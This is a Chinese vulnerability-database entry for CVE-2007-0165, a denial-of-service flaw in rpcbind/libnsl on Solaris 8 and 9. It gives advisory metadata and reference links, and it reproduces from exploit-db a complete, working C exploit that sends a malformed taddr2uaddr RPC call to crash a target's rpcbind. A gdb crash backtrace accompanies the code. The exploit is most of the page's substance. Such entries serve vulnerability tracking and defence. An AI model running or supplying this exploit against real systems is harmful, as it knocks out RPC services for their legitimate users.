Sun Solaris RPC未明漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111974 漏洞类型 其他
发布时间 2007-01-09 更新时间 2009-03-04
CVE编号 CVE-2007-0165 CNNVD-ID CNNVD-200701-077
漏洞平台 Solaris CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/29406
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-077
|漏洞详情
SunSolaris8和9版本中的libnsl存在未明漏洞。远程攻击者可以借助畸形的RPC请求,来引起拒绝服务攻击(崩溃)。该RPC请求会在rpcbind中触发崩溃。
|漏洞EXP
source: http://www.securityfocus.com/bid/21964/info

The Solaris operating system is prone to a denial-of-service vulnerability. 

An attacker can exploit this issue to crash the 'rpcbind(1M)' server, denying service to legitimate users.

/*
////////////////////////////////////////////////////////////
// Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote DoS
////////////////////////////////////////////////////////////
//
// Federico L. Bossi Bonin
// fbossi[at]globalST[dot]com[dot]ar
/////////////////////////////////////////////////////


Program received signal SIGSEGV, Segmentation fault.
0xff29b5f4 in __inet_taddr2uaddr () from /usr/lib/libnsl.so.1
(gdb) backtrace
#0  0xff29b5f4 in __inet_taddr2uaddr () from /usr/lib/libnsl.so.1
#1  0x00013d88 in rpcbproc_taddr2uaddr_com ()
#2  0x000161c0 in rpcb_service_4 ()
(gdb)

*/

#include <string.h>
#include <rpc/rpc.h>

struct xdr {
        long long_arg;
        char *string_arg;
};

typedef struct xdr xdr;
static struct timeval TIMEOUT = { 25, 0 };

bool_t xdr_xdr (XDR *xdrs, xdr *objp) {
        register int32_t *buf;

         if (!xdr_long (xdrs, &objp->long_arg))
                 return FALSE;
         if (!xdr_string (xdrs, &objp->string_arg, 4096))
                 return FALSE;
        return TRUE;
}

char ** str_4(xdr *argp, CLIENT *clnt) {
        static char *clnt_res;

        memset((char *)&clnt_res, 0, sizeof(clnt_res));
        if (clnt_call (clnt, 8,
                (xdrproc_t) xdr_xdr, (caddr_t) argp,
                (xdrproc_t) xdr_wrapstring, (caddr_t) &clnt_res,
                TIMEOUT) != RPC_SUCCESS) {
                return (NULL);
        }
        return (&clnt_res);
}

main(int argc, char *argv[]) {
  CLIENT *c1;
  char *server;
  char **sresult;


  if (argc !=2){
    printf("=============================================================\n");
    printf("Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote DoS\n");
    printf("-------------------------------------------------------------\n");
    printf("Federico L. Bossi Bonin <fbossi@globalST.com.ar>\n");
    printf("=============================================================\n\n");
    printf("usage: %s <IP>\n",argv[0]);
    exit(1);
  }

  server = argv[1];

if ((c1 = clnt_create(server,100000, 4, "tcp")) == NULL){
       clnt_pcreateerror(server);
    exit(1);
  }

  xdr xdrmessage;
  xdrmessage.long_arg = 0;
  xdrmessage.string_arg="";

  if ((sresult = str_4(&xdrmessage, c1)) == NULL){
   clnt_perror(c1, server);
   exit(1);
  }

  clnt_destroy(c1);
  exit(0);
}
|参考资料

来源:SUNALERT
名称:102713
链接:http://sunsolve.sun.com/search/document.do?assetkey=1-26-102713-1
来源:OVAL
名称:oval:org.mitre.oval:def:5920
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:5920
来源:OSVDB
名称:31576
链接:http://osvdb.org/31576
来源:XF
名称:solaris-rpcbind-dos(31366)
链接:http://xforce.iss.net/xforce/xfdb/31366
来源:BID
名称:21964
链接:http://www.securityfocus.com/bid/21964
来源:VUPEN
名称:ADV-2007-0110
链接:http://www.frsirt.com/english/advisories/2007/0110
来源:support.avaya.com
链接:http://support.avaya.com/elmodocs2/security/ASA-2007-036.htm
来源:SECTRACK
名称:1017492
链接:http://securitytracker.com/id?1017492
来源:SECUNIA
名称:24056
链接:http://secunia.com/advisories/24056
来源:SECUNIA
名称:23700
链接:http://secunia.com/advisories/23700
来源:USGovernmentResource:oval:org.mitre.oval:def:2210
名称:oval:org.mitre.oval:def:2210
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:2210